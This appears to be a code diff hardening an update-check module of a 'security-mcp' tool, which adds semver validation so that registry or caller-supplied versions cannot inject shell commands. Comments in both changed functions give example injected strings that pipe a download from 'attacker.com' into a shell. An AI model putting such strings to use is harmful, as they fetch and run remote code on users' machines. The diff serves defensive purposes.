-    let latestMcpVersion = null;
+/** Fetch and validate the latest security-mcp version from npm. Returns null on failure. */
+async function fetchLatestMcpVersion() {
     const npmRaw = await httpsGet(NPM_REGISTRY_URL, MAX_NPM_BYTES, 3000);
-    if (npmRaw) {
-        try {
-            latestMcpVersion = JSON.parse(npmRaw).version ?? null;
-        }
-        catch { /* ignore */ }
+    if (!npmRaw)
+        return null;
+    try {
+        const parsed = JSON.parse(npmRaw).version ?? null;
+        // CWE-20: reject malformed version strings — a MitM could return a crafted
+        // version like "1.0.0 && curl attacker.com | sh" to inject shell commands.
+        if (parsed && SEMVER_RE.test(parsed))
+            return parsed;
+        if (parsed)
+            console.warn(`[checkUpdates] Ignoring malformed version string from npm registry: ${JSON.stringify(parsed)}`);
     }
-    // Check skills manifest for skill updates
-    const skillUpdates = [];
-    const versions = readJson(SKILL_VERSIONS_PATH, {});
+    catch { /* ignore parse error */ }
+    return null;
+}
+/** Fetch the skills manifest and return a list of skills that have a newer version. */
+async function fetchSkillUpdates(versions) {
     const manifestRaw = await httpsGet(SKILLS_MANIFEST_URL, MAX_MANIFEST_BYTES, 3000);
-    if (manifestRaw) {
-        try {
-            const manifest = JSON.parse(manifestRaw);
-            for (const [name, entry] of Object.entries(manifest.skills)) {
-                const current = versions[name]?.version;
-                if (current && current !== entry.version) {
-                    skillUpdates.push({ skillName: name, currentVersion: current, latestVersion: entry.version });
-                }
-            }
-        }
-        catch { /* ignore */ }
+    if (!manifestRaw)
+        return [];
+    try {
+        const manifest = JSON.parse(manifestRaw);
+        return Object.entries(manifest.skills).flatMap(([name, entry]) => {
+            const current = versions[name]?.version;
+            return current && current !== entry.version
+                ? [{ skillName: name, currentVersion: current, latestVersion: entry.version }]
+                : [];
+        });
     }
+    catch { /* ignore parse error */ }
+    return [];
+}
+export async function checkUpdates(args) {
+    const { currentMcpVersion } = args;
+    const versions = readJson(SKILL_VERSIONS_PATH, {});
+    const [latestMcpVersion, skillUpdates] = await Promise.all([
+        fetchLatestMcpVersion(),
+        fetchSkillUpdates(versions)
+    ]);
     const hasUpdate = (latestMcpVersion !== null && latestMcpVersion !== currentMcpVersion) ||
         skillUpdates.length > 0;
-    let changelog = "";
+    const changelogParts = [];
     if (latestMcpVersion && latestMcpVersion !== currentMcpVersion) {
-        changelog += `security-mcp: ${currentMcpVersion} → ${latestMcpVersion}\n`;
+        changelogParts.push(`security-mcp: ${currentMcpVersion} → ${latestMcpVersion}`);
     }
     if (skillUpdates.length > 0) {
-        changelog += `Skills with updates: ${skillUpdates.map((s) => s.skillName).join(", ")}`;
+        changelogParts.push(`Skills with updates: ${skillUpdates.map((s) => s.skillName).join(", ")}`);
     }
-    return { hasUpdate, currentMcpVersion, latestMcpVersion, skillUpdates, changelog };
+    return { hasUpdate, currentMcpVersion, latestMcpVersion, skillUpdates, changelog: changelogParts.join("\n") };
 }
 // 8. apply_updates (returns instructions for the SKILL.md to surface to user)
 // ---------------------------------------------------------------------------
@@ -544,11 +663,27 @@ export async function applyUpdates(args) {
     const { choice, latestMcpVersion, skillUpdates } = args;
     const commands = [];
     if (latestMcpVersion) {
+        // CWE-20 / TM-004: latestMcpVersion is caller-supplied (not guaranteed to come from
+        // fetchLatestMcpVersion which validates against SEMVER_RE). A compromised npm
+        // registry response or a direct MCP call could inject shell metacharacters into the
+        // command string. Even though applyUpdates only *returns* commands (never execs them),
+        // a crafted string like "1.0.0; curl attacker.com|sh" would be surfaced to the user
+        // for copy-paste execution. Reject non-semver versions defensively.
+        if (!SEMVER_RE.test(latestMcpVersion)) {
+            throw new Error(`applyUpdates: latestMcpVersion "${latestMcpVersion}" is not a valid semver string. ` +
+                `Refusing to generate update commands to prevent command injection.`);
+        }
         commands.push(`npm install -g security-mcp@${latestMcpVersion}`);
         commands.push(`security-mcp install`);
     }
     if (skillUpdates?.length) {
-        commands.push(`# Re-download updated skills (handled automatically next time /ciso-orchestrator runs)`, ...skillUpdates.map((s) => `# skill: ${s.skillName} will be refreshed via orchestration.ensure_skill`));
+        // CWE-20: validate skillName before interpolating into command strings
+        const safeSkills = skillUpdates.filter((s) => SAFE_SKILL_NAME_RE.test(s.skillName));
+        const rejectedCount = skillUpdates.length - safeSkills.length;
+        if (rejectedCount > 0) {
+            console.warn(`[applyUpdates] Rejected ${rejectedCount} skill(s) with unsafe names.`);
+        }
+        commands.push(`# Re-download updated skills (handled automatically next time /ciso-orchestrator runs)`, ...safeSkills.map((s) => `# skill: ${s.skillName} will be refreshed via orchestration.ensure_skill`));
     }
     const message = choice === "auto"
         ? `Run the following commands to update:\n${commands.filter((c) => !c.startsWith("#")).join("\n")}`